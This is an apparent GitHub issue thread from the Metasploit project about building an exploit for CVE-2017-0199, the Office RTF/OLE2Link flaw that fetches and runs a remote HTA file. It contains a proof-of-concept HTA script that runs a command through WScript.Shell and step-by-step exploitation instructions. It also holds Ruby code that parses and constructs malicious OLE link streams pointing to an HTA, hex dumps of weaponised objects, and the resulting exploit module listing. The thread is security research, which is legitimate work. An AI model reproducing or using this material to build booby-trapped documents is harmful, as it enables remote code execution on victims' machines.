rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

CVE-2017-0199 - exploit office with ole link object #8220

Closed nixawk closed 7 years ago

nixawk commented 7 years ago

The existence of the flaw was revealed by McAfee researchers on Friday, and confirmed by FireEye researchers on Saturday. The latter shared details about it with Microsoft weeks ago, and were waiting to publicly reveal the flaw once Microsoft pushed out a patch. The patch is still to be released.

“The root cause of the zero-day vulnerability is related to the Windows Object Linking and Embedding (OLE), an important feature of Office,” McAfee researchers noted.

The flaw is exploited through a specially crafted Microsoft Word RTF (Rich Text Format) file, which contains an embedded OLE2link object. The object instructs Word to send an HTTP request to a remote server controlled by the attackers, to retrieve from it a malicious .hta file masquerading as an RTF file.

A .hta file is an executable, and in this case it loads and executes a malicious script that closes Word (i.e. the winword.exe process), downloads additional payloads, and starts Word again and shows a decoy document.

“Because .hta is executable, the attacker gains full code execution on the victim’s machine. Thus, this is a logical bug, and gives the attackers the power to bypass any memory-based mitigations developed by Microsoft,” the researchers explained.

References

  1. https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/
  2. https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html
  3. https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/
  4. https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html
  5. https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf
  6. https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/
  7. https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100
  8. https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/
  9. https://www.microsoft.com/en-us/download/details.aspx?id=7105
  10. https://www.microsoft.com/en-us/download/details.aspx?id=10725
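The articles quoted above describe the malicious document as an RTF carrying an embedded OLE2Link object. The check below is an added example for this thread (mine, not code from the issue, the quoted articles or Metasploit; Ruby because that is the framework's language): it carves every `\objdata` destination out of an RTF, decodes the hex, and reads the OLE1 ObjectHeader that sits in front of the embedded data, which is where the `OLE2Link` class name that rtfobj prints later in this thread comes from. The sample RTF is constructed inside the code and its native data is only a CFB signature plus zero padding, not a real compound file; all function names are mine.

```ruby
require 'stringio'

CFB_MAGIC = "\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1".b
FORMAT_IDS = { 1 => 'LinkedObject', 2 => 'EmbeddedObject' }.freeze

# LengthPrefixedAnsiString: DWORD length (including the NUL) followed by the bytes.
def ole1_ansi(str)
  s = str.b + "\x00".b
  [s.bytesize].pack('V') + s
end

def read_ansi(io)
  len = io.read(4).unpack1('V')
  len.zero? ? '' : io.read(len).chomp("\0")
end

# Decode every {\*\objdata ...} destination in an RTF string to binary. Non-hex
# characters are dropped; nested groups inside objdata (obfuscated samples) are
# out of scope for this triage check.
def objdata_blobs(rtf)
  rtf.scan(/\{\\\*\\objdata\b([^{}]*)\}/).map do |(body)|
    [body.gsub(/[^0-9a-fA-F]/, '')].pack('H*')
  end
end

# OLE1 ObjectHeader ([MS-OLEDS] 2.2.4): OLEVersion, FormatID, ClassName, TopicName,
# ItemName; an EmbeddedObject (FormatID 2) then carries NativeDataSize + NativeData,
# which for an OLE2Link object is a CFB (compound file) holding the "\x01Ole" stream.
def parse_ole1_header(blob)
  io = StringIO.new(blob.b)
  ole_version, format_id = io.read(8).unpack('V2')
  info = { ole_version: ole_version, format_id: format_id,
           format: FORMAT_IDS.fetch(format_id, 'unknown') }
  info[:class_name] = read_ansi(io)
  info[:topic_name] = read_ansi(io)
  info[:item_name]  = read_ansi(io)
  if format_id == 2
    size = io.read(4).unpack1('V')
    native = io.read(size) || ''.b
    info[:native_size] = size
    info[:native_is_cfb] = native.start_with?(CFB_MAGIC)
    info[:native_data] = native
  end
  info
end

# Triage: every embedded object whose OLE1 header names the OLE2Link class.
def ole2link_objects(rtf)
  objdata_blobs(rtf).map { |b| parse_ole1_header(b) }
                    .select { |h| h[:class_name] == 'OLE2Link' }
end

# Constructed RTF for the test, not a sample from the wild: one \objautlink object
# with an OLE2Link header whose native data is just a CFB signature and padding.
def sample_rtf
  native = CFB_MAGIC + ("\x00" * 24).b
  header = [0x0501, 2].pack('V2') + ole1_ansi('OLE2Link') + [0, 0].pack('V2') +
           [native.bytesize].pack('V')
  hex = (header + native).unpack1('H*').scan(/.{1,64}/).join("\n")
  "{\\rtf1\\ansi\n{\\object\\objautlink\n{\\*\\objdata\n#{hex}\n}}\n\\par }"
end
```

On a real document, `:native_data` is the whole compound file; feeding it to a CFB parser and reading its `"\x01Ole"` stream gives the link target, which is what the ministream dump further down this thread shows.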
nixawk commented 7 years ago

If regedit shows as

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{00000300-0000-0000-C000-000000000046}\InprocServer32]
@="ole32.dll"

poc.rtf

<script>
a=new ActiveXObject("WScript.Shell");
a.run('%windir%\\System32\\cmd.exe /c calc.exe', 0);window.close();
</script>

Windows fails to execute the payload. StdOleLink is the key.

How to exploit the vulnerability?

  1. Set up an HTA server.
  2. Insert a package with the HTA URL.

(screenshot from 2017-04-12, not reproduced)

CVE-2017-0199
https://github.com/nixawk/labs/tree/master/CVE-2017-0199

vysecurity commented 7 years ago

Have you got it working?

I host RTF and autolink then switch to HTA with application content type. Works fine this way.

Autolaunch too

nixawk commented 7 years ago

@vysec Could you show more details about your lab and Office version? I've tested it on Windows 7 Ultimate (not SP1) with Office 2010, but it failed.

With Windows 7 SP1, everything goes well.

https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html

Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Microsoft Office 2007 Service Pack 3
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
Windows Vista Service Pack 2
Windows Server 2008 for Itanium-Based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Vista x64 Edition Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

vysecurity commented 7 years ago

OK works fine now :)

Some "technical reports" out there are reporting false samples... Not every random OLE2Link is the 1-day. There's a 0-day technique out there to bypass some prompts / measures, but the 1-day in question isn't what's displayed in some of the reports, as the payload's not even correct...

nixawk commented 7 years ago

Is there a way to create a vulnerable docx with metasploit ?

busterb commented 7 years ago

modules/exploits/windows/fileformat/office_word_macro.rb creates malicious .docx files, it just tweaks xml and zips it up.

vysecurity commented 7 years ago

I'll have a look after work

nixawk commented 7 years ago
(three screenshots from 2017-04-13, not reproduced)
nixawk commented 7 years ago

I've created an rb script to parse the OLE object bin, as follows. Could anyone show me how to parse data = ministream.instance_variable_get(:@data)? Is there a format link for data? How do I create new data to replace it?

https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf

*** ministream (384 bytes):
{
  sid => 0x0,
  _ab => "Root Entry",          # Directory Entry Name
  _cb => 0x0016,                # Directory Entry Name Length 
  _mse => 0x02,                 # Object Type
  _bflags => 0x00,              # Color Flag 
  _sidLeftSib => 0xffffffff,    # Left Sibling ID 
  _sidRightSib => 0xffffffff,   # Right Sibling ID
  _sidChild => 0xffffffff,      # Child ID 
  _clsId => 00000000-0000-0000-0000-000000000000,  # CLSID
  _dwUserFlags => 0x00000000,                      # State Flags
  _ctime => 00 00 00 00 00 00 00 00    |........|  # Creation Time
  _mtime => 00 00 00 00 00 00 00 00    |........|  # Modification Time
  _sectStart => 0xfffffffe,                        # Starting Sector Location 
  _ulSize => 0x0000000000000180,                   # Stream Size 
  data =>
01 00 00 02 09 00 00 00 01 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 6e 00 00 00 e0 c9 ea 79    |........n......y|
f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 56 00 00 00    |.........K..V...|
68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 31 00    |h.t.t.p.:././.1.|
39 00 32 00 2e 00 31 00 36 00 38 00 2e 00 32 00    |9.2...1.6.8...2.|
30 00 36 00 2e 00 31 00 34 00 34 00 2f 00 70 00    |0.6...1.4.4./.p.|
6f 00 63 00 2e 00 72 00 74 00 66 00 00 00 79 58    |o.c...r.t.f...yX|
81 f4 3b 1d 7f 48 af 2c 82 5d c4 85 27 63 00 00    |..;..H.,.]..'c..|
00 00 a5 ab 00 00 ff ff ff ff 06 09 02 00 00 00    |................|
00 00 c0 00 00 00 00 00 00 46 00 00 00 00 ff ff    |.........F......|
ff ff 00 00 00 00 00 00 00 00 e0 81 81 54 cb b4    |.............T..|
d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
10 00 03 00 0d 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
1e 00 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38    |..http://192.168|
2e 32 30 36 2e 31 34 34 2f 70 6f 63 2e 72 74 66    |.206.144/poc.rtf|
00 00 bb bb cc cc 1e 00 68 00 74 00 74 00 70 00    |........h.t.t.p.|
3a 00 2f 00 2f 00 31 00 39 00 32 00 2e 00 31 00    |:././.1.9.2...1.|
36 00 38 00 2e 00 32 00 30 00 36 00 2e 00 31 00    |6.8...2.0.6...1.|
34 00 34 00 2f 00 70 00 6f 00 63 00 2e 00 72 00    |4.4./.p.o.c...r.|
74 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00    |t.f.............|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
}

Parse OLE Object Bin

require 'ole/storage'   # ruby-ole gem
require 'rex/ole'       # rex-ole gem, bundled with Metasploit

# OLE1 native data carved out of the RTF object (here by rtfobj): a compound file
filename = 'test.doc_object_000001BC.bin'

# ole/storage: walk the compound file's directory
ole = Ole::Storage.open(filename, 'rb+')
puts ole.dirents.length
puts ole.root.to_tree

# rex/ole: the ministream holds every stream smaller than the mini-sector cutoff
# (0x1000 bytes) packed back to back; the "\x01Ole" link stream starts at mini-sector 0
ole = Rex::OLE::Storage.new(filename, Rex::OLE::STGM_READ)
ministream = ole.instance_variable_get(:@ministream)
data = ministream.instance_variable_get(:@data)

# dump the raw ministream for inspection in a hex editor
::File.open('ole-ministream.bin', 'wb+') { |f| f.write(data) }
CVE-2017-0199 ->> ruby read_ole.rb

From: /Users/nixawk/Desktop/CVE-2017-0199/read_ole.rb @ line 19 :

    14: require 'rex/ole'
    15: ole = Rex::OLE::Storage.new(filename, Rex::OLE::STGM_READ)
    16: ministream = ole.instance_variable_get(:@ministream)
    17: # puts ministream.instance_variable_get(:@data)
    18:
 => 19: binding.pry

[1] pry(main)> ministream
=> #<Rex::OLE::Stream:0x007fc37584de48
 @_ab="Root Entry",
 @_bflags=0,
 @_cb=nil,
 @_clsId=#<Rex::OLE::CLSID:0x007fc37584ddd0 @buf="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00">,
 @_ctime="\x00\x00\x00\x00\x00\x00\x00\x00",
 @_dwUserFlags=0,
 @_mse=2,
 @_mtime="\x00\x00\x00\x00\x00\x00\x00\x00",
 @_sectStart=4294967294,
 @_sidChild=4294967295,
 @_sidLeftSib=4294967295,
 @_sidRightSib=4294967295,
 @_ulSize=512,
 @children=[],
 @data=
  "\x01\x00\x00\x02\t\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\\x01\x00\x00\xE0\xC9\xEAy\xF9\xBA\xCE\x11\x8C\x82\x00\xAA\x00K\xA9\vD\x01\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00h\x00y\x00o\x00e\x00y\x00e\x00e\x00p\x00.\x00w\x00s\x00/\x00t\x00e\x00m\x00p\x00l\x00a\x00t\x00e\x00.\x00d\x00o\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00yX\x81\xF4;\x1D\x7FH\xAF,\x82]\xC4\x85'c\x00\x00\x00\x00\xA5\xAB\x00\x00\xFF\xFF\xFF\xFF i3%\xF9\x03\xCF\x11\x8F\xD0\x00\xAA\x00ho\x13\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x03\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
 @offset=0,
 @sid=0,
 @stg=
  header = {
  _abSig => "\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1",
  _clid => 00000000-0000-0000-0000-000000000000,
  _uMinorVersion => 0x003e,
  _uMajorVersion => 0x0003,
  _uByteOrder => 0xfffe,
  _uSectorShift => 0x0009,
  _uMiniSectorShift => 0x0006,
  _csectDir => 0x00000000,
  _csectFat => 0x00000001,
  _sectDirStart => 0x00000001,
  _signature => 0x00000000,
  _uMiniSectorCutoff => 0x00001000,
  _sectMiniFatStart => 0x00000002,
  _csectMiniFat => 0x00000001,
  _sectDifStart => 0xfffffffe,
  _csectDif => 0x00000000
}
*** 109 DIFAT sectors
{ 0x0, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE }
*** 128 FAT sectors
{ FAT, END, END, END, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE }
*** 128 MiniFAT sectors:
{ 0x1, 0x2, 0x3, 0x4, 0x5, 0x6, END, END, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE }
*** ministream (512 bytes):
{
  sid => 0x0,
  _ab => "Root Entry",
  _cb => 0x0016,
  _mse => 0x02,
  _bflags => 0x00,
  _sidLeftSib => 0xffffffff,
  _sidRightSib => 0xffffffff,
  _sidChild => 0xffffffff,
  _clsId => 00000000-0000-0000-0000-000000000000,
  _dwUserFlags => 0x00000000,
  _ctime => 00 00 00 00 00 00 00 00    |........|
  _mtime => 00 00 00 00 00 00 00 00    |........|
  _sectStart => 0xfffffffe,
  _ulSize => 0x0000000000000200,
  data =>
01 00 00 02 09 00 00 00 01 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 5c 01 00 00 e0 c9 ea 79    |........\......y|
f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 44 01 00 00    |.........K..D...|
68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 68 00    |h.t.t.p.:././.h.|
79 00 6f 00 65 00 79 00 65 00 65 00 70 00 2e 00    |y.o.e.y.e.e.p...|
77 00 73 00 2f 00 74 00 65 00 6d 00 70 00 6c 00    |w.s./.t.e.m.p.l.|
61 00 74 00 65 00 2e 00 64 00 6f 00 63 00 00 00    |a.t.e...d.o.c...|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 79 58 81 f4    |............yX..|
3b 1d 7f 48 af 2c 82 5d c4 85 27 63 00 00 00 00    |;..H.,.]..'c....|
a5 ab 00 00 ff ff ff ff 20 69 33 25 f9 03 cf 11    |........ i3%....|
8f d0 00 aa 00 68 6f 13 00 00 00 00 ff ff ff ff    |.....ho.........|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
10 00 03 00 04 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
}
*** 3 directory entries
{
  sid => 0x0,
  _ab => "Root Entry",
  _cb => 0x0016,
  _mse => 0x05,
  _bflags => 0x00,
  _sidLeftSib => 0xffffffff,
  _sidRightSib => 0xffffffff,
  _sidChild => 0x00000001,
  _clsId => 00000300-0000-0000-c000-000000000046,
  _dwUserFlags => 0x00000000,
  _ctime => 00 00 00 00 00 00 00 00    |........|
  _mtime => 10 4e ab 9b 42 49 d2 01    |.N..BI..|
  _sectStart => 0x00000003,
  _ulSize => 0x0000000000000200,
  *children* =>
  {
    sid => 0x1,
    _ab => "\x01Ole",
    _cb => 0x000a,
    _mse => 0x02,
    _bflags => 0x01,
    _sidLeftSib => 0xffffffff,
    _sidRightSib => 0x00000002,
    _sidChild => 0xffffffff,
    _clsId => 00000000-0000-0000-0000-000000000000,
    _dwUserFlags => 0x00000000,
    _ctime => 00 00 00 00 00 00 00 00    |........|
    _mtime => 00 00 00 00 00 00 00 00    |........|
    _sectStart => 0x00000000,
    _ulSize => 0x00000000000001a8,
    data =>
--NOT OPENED YET--
  }
  {
    sid => 0x2,
    _ab => "\x03ObjInfo",
    _cb => 0x0012,
    _mse => 0x02,
    _bflags => 0x00,
    _sidLeftSib => 0xffffffff,
    _sidRightSib => 0xffffffff,
    _sidChild => 0xffffffff,
    _clsId => 00000000-0000-0000-0000-000000000000,
    _dwUserFlags => 0x00000000,
    _ctime => 00 00 00 00 00 00 00 00    |........|
    _mtime => 00 00 00 00 00 00 00 00    |........|
    _sectStart => 0x00000007,
    _ulSize => 0x0000000000000006,
    data =>
--NOT OPENED YET--
  }

}
>
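An added example (mine, not nixawk's script or the module's code) answering the parsing question in the comment above: `data` is the raw ministream, and its first mini-sectors hold the `"\x01Ole"` stream, the OLEStream structure of [MS-OLEDS] 2.3.3. The parser below walks that header, reads the absolute-source moniker (the CLSID `79eac9e0-baf9-11ce-8c82-00aa004ba90b` in both dumps is the URL moniker, followed by a DWORD length and the UTF-16LE URL), then the Clsid announced by the `0xFFFFFFFF` indicator, which is `00020906-...-0046` (Word.Document.8) in nixawk's test file and `25336920-03f9-11cf-8fd0-00aa00686f13` (htafile) in the hybrid-analysis sample. A builder produces replacement bytes with the same layout. Two things are observations from the dumps rather than spec statements: the moniker-size DWORD is 4 bytes larger than the moniker data actually present (0x6e for 106 bytes, 0x15c for 344), so the parser trusts the moniker's own length prefix and the builder reproduces the observed value; and the flags value 0xABA5 is simply copied. `SAMPLE_OLE_STREAM` is the first 192 bytes of the first dump above; the CLSID-to-name table and the name `URL_MONIKER_SERIAL_GUID` (for the GUID that follows the URL in both dumps) are mine.

```ruby
require 'stringio'

URL_MONIKER_CLSID = '79eac9e0-baf9-11ce-8c82-00aa004ba90b'
# GUID that follows the URL in both dumps (then DWORD version, DWORD flags); name is mine.
URL_MONIKER_SERIAL_GUID = 'f4815879-1d3b-487f-af2c-825dc4852763'
KNOWN_CLSIDS = {
  '00020906-0000-0000-c000-000000000046' => 'Word.Document.8',
  '25336920-03f9-11cf-8fd0-00aa00686f13' => 'htafile'
}.freeze

# First 192 bytes of the ministream dumped above (the "\x01Ole" stream, mini-sectors 0-2).
SAMPLE_OLE_STREAM = [<<~HEX.delete(" \n")].pack('H*')
  01 00 00 02 09 00 00 00 01 00 00 00 00 00 00 00
  00 00 00 00 00 00 00 00 6e 00 00 00 e0 c9 ea 79
  f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 56 00 00 00
  68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 31 00
  39 00 32 00 2e 00 31 00 36 00 38 00 2e 00 32 00
  30 00 36 00 2e 00 31 00 34 00 34 00 2f 00 70 00
  6f 00 63 00 2e 00 72 00 74 00 66 00 00 00 79 58
  81 f4 3b 1d 7f 48 af 2c 82 5d c4 85 27 63 00 00
  00 00 a5 ab 00 00 ff ff ff ff 06 09 02 00 00 00
  00 00 c0 00 00 00 00 00 00 46 00 00 00 00 ff ff
  ff ff 00 00 00 00 00 00 00 00 e0 81 81 54 cb b4
  d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HEX

# 16 little-endian GUID bytes <-> "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"
def clsid_to_s(raw)
  a, b, c, d, e = raw.unpack('VvvH4H12')
  format('%08x-%04x-%04x-%s-%s', a, b, c, d, e)
end

def clsid_from_s(str)
  a, b, c, d, e = str.downcase.split('-')
  [a.hex, b.hex, c.hex, d, e].pack('VvvH4H12')
end

# URL moniker data after its CLSID: DWORD length, NUL-terminated UTF-16LE URL
# (possibly zero-padded), optionally followed by serial GUID, version and flags.
def parse_url_moniker(io)
  len = io.read(4).unpack1('V')
  body = io.read(len) || ''.b
  units = body.unpack('v*')
  url = units[0, units.index(0) || units.length].pack('U*')
  info = { clsid: URL_MONIKER_CLSID, url: url }
  if body.bytesize >= 24 && clsid_to_s(body[-24, 16]) == URL_MONIKER_SERIAL_GUID
    info[:uri_flags] = body[-4, 4].unpack1('V')
  end
  info
end

# OLEStream ([MS-OLEDS] 2.3.3) -> hash of header fields, monikers and linked CLSID.
def parse_ole_stream(bytes)
  io = StringIO.new(bytes.b)
  version, flags, link_update, _reserved1 = io.read(16).unpack('V4')
  out = { version: version, flags: flags, link_update_option: link_update }
  # Reserved, RelativeSource and AbsoluteSource monikers: a size DWORD, then a
  # MONIKERSTREAM (16-byte moniker CLSID + moniker data); size 0 means absent.
  %i[reserved_moniker relative_source absolute_source].each do |name|
    size = io.read(4).unpack1('V')
    next if size.zero?
    start = io.pos
    clsid = clsid_to_s(io.read(16))
    if clsid == URL_MONIKER_CLSID
      # In both dumps above the size DWORD is 4 larger than the moniker that follows
      # (0x6e vs 106, 0x15c vs 344), so the inner length prefix decides where the
      # next field starts, not the outer size.
      out[name] = parse_url_moniker(io)
    else
      out[name] = { clsid: clsid }
      io.pos = start + size
    end
  end
  # ClsidIndicator 0xFFFFFFFF announces the 16-byte Clsid of the linked object.
  if io.read(4).unpack1('V') == 0xFFFFFFFF
    clsid = clsid_to_s(io.read(16))
    out[:clsid] = clsid
    out[:clsid_name] = KNOWN_CLSIDS.fetch(clsid, 'unknown')
  end
  out
end

# Serialize an OLEStream with one absolute URL moniker in the dumped layout: size
# DWORD 4 larger than the moniker, flags value copied from the dumps, empty display
# name, zeroed timestamps. clsid_str is the CLSID the link resolves to.
def build_ole_stream(url, clsid_str, uri_flags: 0xABA5)
  wide_url = (url.unpack('U*') + [0]).pack('v*')
  moniker_data = wide_url + clsid_from_s(URL_MONIKER_SERIAL_GUID) + [0, uri_flags].pack('V2')
  moniker = clsid_from_s(URL_MONIKER_CLSID) + [moniker_data.bytesize].pack('V') + moniker_data
  stream = [0x02000001, 0x09, 1, 0].pack('V4')  # Version, Flags, LinkUpdateOption, Reserved1
  stream << [0, 0].pack('V2')                    # no Reserved / RelativeSource monikers
  stream << [moniker.bytesize + 4].pack('V') << moniker
  stream << [0xFFFFFFFF].pack('V') << clsid_from_s(clsid_str)
  stream << [0, 0, 0, 0, 0].pack('V5')           # ReservedDisplayName len, Reserved2, update times
end
```

Running `parse_ole_stream` over the `data` pulled out with `Rex::OLE` above gives the URL and the linked CLSID directly; comparing the CLSID against the htafile entry is the quickest way to separate the real sample from the "false samples" vysec mentions, since a plain Word.Document.8 link with a URL moniker is what Word itself writes for any linked document.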
vysecurity commented 7 years ago

So I applied the patch... but the machine is still vulnerable... ???

nixawk commented 7 years ago

@busterb @vysec The CVE-2017-0199 module is created. Please wait for more tests.

msf exploit(ms17_0199_rtf) > info

       Name: MS14-017 Microsoft Word RTF Object Confusion
     Module: exploit/windows/fileformat/ms17_0199_rtf
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-04-14

Provided by:
  Haifei Li
  ryHanson
  wdormann
  DidierStevens
  vysec
  Nixawk

Available targets:
  Id  Name
  --  ----
  0   Microsoft Office

Basic options:
